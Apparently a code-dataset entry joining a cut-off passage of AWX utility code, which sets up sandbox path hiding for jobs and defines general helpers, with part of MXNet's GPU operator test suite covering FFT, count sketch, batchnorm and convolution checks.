hide_paths = [settings.AWX_PROOT_BASE_PATH]
if not kwargs.get('isolated'):
hide_paths.extend(['/etc/tower', '/var/lib/awx', '/var/log', '/etc/ssh',
settings.PROJECTS_ROOT, settings.JOBOUTPUT_ROOT])
hide_paths.extend(getattr(settings, 'AWX_PROOT_HIDE_PATHS', None) or [])
for path in sorted(set(hide_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
if os.path.isdir(path):
new_path = tempfile.mkdtemp(dir=kwargs['proot_temp_dir'])
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
else:
handle, new_path = tempfile.mkstemp(dir=kwargs['proot_temp_dir'])
os.close(handle)
os.chmod(new_path, stat.S_IRUSR | stat.S_IWUSR)
new_args.extend(['--bind', '%s' %(new_path,), '%s' % (path,)])
if kwargs.get('isolated'):
show_paths = [kwargs['private_data_dir']]
elif 'private_data_dir' in kwargs:
show_paths = [cwd, kwargs['private_data_dir']]
else:
show_paths = [cwd]
for venv in (
settings.ANSIBLE_VENV_PATH,
settings.AWX_VENV_PATH,
kwargs.get('proot_custom_virtualenv')
):
if venv:
new_args.extend(['--ro-bind', venv, venv])
show_paths.extend(getattr(settings, 'AWX_PROOT_SHOW_PATHS', None) or [])
show_paths.extend(kwargs.get('proot_show_paths', []))
for path in sorted(set(show_paths)):
if not os.path.exists(path):
continue
path = os.path.realpath(path)
new_args.extend(['--bind', '%s' % (path,), '%s' % (path,)])
if kwargs.get('isolated'):
if '/bin/ansible-playbook' in ' '.join(args):
# playbook runs should cwd to the SCM checkout dir
new_args.extend(['--chdir', os.path.join(kwargs['private_data_dir'], 'project')])
else:
# ad-hoc runs should cwd to the root of the private data dir
new_args.extend(['--chdir', kwargs['private_data_dir']])
else:
new_args.extend(['--chdir', cwd])
new_args.extend(args)
return new_args
def get_pk_from_dict(_dict, key):
'''
Helper for obtaining a pk from user data dict or None if not present.
'''
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices(custom_paths=None):
from django.conf import settings
custom_paths = custom_paths or settings.CUSTOM_VENV_PATHS
all_venv_paths = [settings.BASE_VENV_PATH] + custom_paths
custom_venv_choices = []
for custom_venv_path in all_venv_paths:
if os.path.exists(custom_venv_path):
custom_venv_choices.extend([
os.path.join(custom_venv_path, x, '')
for x in os.listdir(custom_venv_path)
if x != 'awx' and
os.path.isdir(os.path.join(custom_venv_path, x)) and
os.path.exists(os.path.join(custom_venv_path, x, 'bin', 'activate'))
])
return custom_venv_choices
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email',
'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None),
'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None) or
getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or
getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(
target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)
).start()
return path
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[:(size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
|
test_operator_gpu.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
import unittest
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed
from test_operator import *
from test_optimizer import *
from test_random import *
from test_gluon import *
from test_loss import *
from test_exc_handling import *
#from test_rnn import *
from test_gluon_rnn import *
from test_sparse_ndarray import test_create_csr, test_create_row_sparse, test_sparse_nd_slice
from test_sparse_ndarray import test_create_sparse_nd_empty, test_create_sparse_nd_from_sparse
from test_sparse_ndarray import test_create_sparse_nd_from_dense, test_create_sparse_nd_infer_shape
from test_sparse_ndarray import test_sparse_nd_check_format, test_sparse_nd_copy
from test_sparse_ndarray import test_sparse_nd_setitem, test_sparse_nd_binary_scalar_op
from test_sparse_operator import *
from test_ndarray import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm
del test_support_vector_machine_l2_svm
def check_countsketch(in_dim,out_dim,n):
sym = mx.sym.contrib.count_sketch(name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
# forward
exe_list = [sym.bind(mx.gpu(0), arr, arr_grad)]
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
assert_almost_equal(a,out1[0],rtol=1e-3, atol=1e-12)
# backward
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
for exe in exe_list:
exe.backward([out_grad])
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
assert_almost_equal(a,arr_grad[0].asnumpy(),rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_countsketch():
nrepeat = 2
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
for repeat in range(nrepeat):
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1,maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12)
@with_seed(0)
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
#forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-8)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-6)
@with_seed(0)
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (4, 2, 3, 5, 5), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=False)
check_consistency(sym, ctx_list_v1_2D)
sym = mx.sym.BatchNorm_v1(name='norm', fix_gamma=True)
check_consistency(sym, ctx_list_v1_2D)
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
#
# # V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNormV1 cpu
if 'batchnorm_v1_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNormV1 gpu (organic)
if 'batchnorm_v1_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm_v1(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_v1_cpu', 'batchnorm_v1_gpu',
'batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list))
@with_seed()
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
def test_convolution_versions():
# 2D convolution NCHW
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
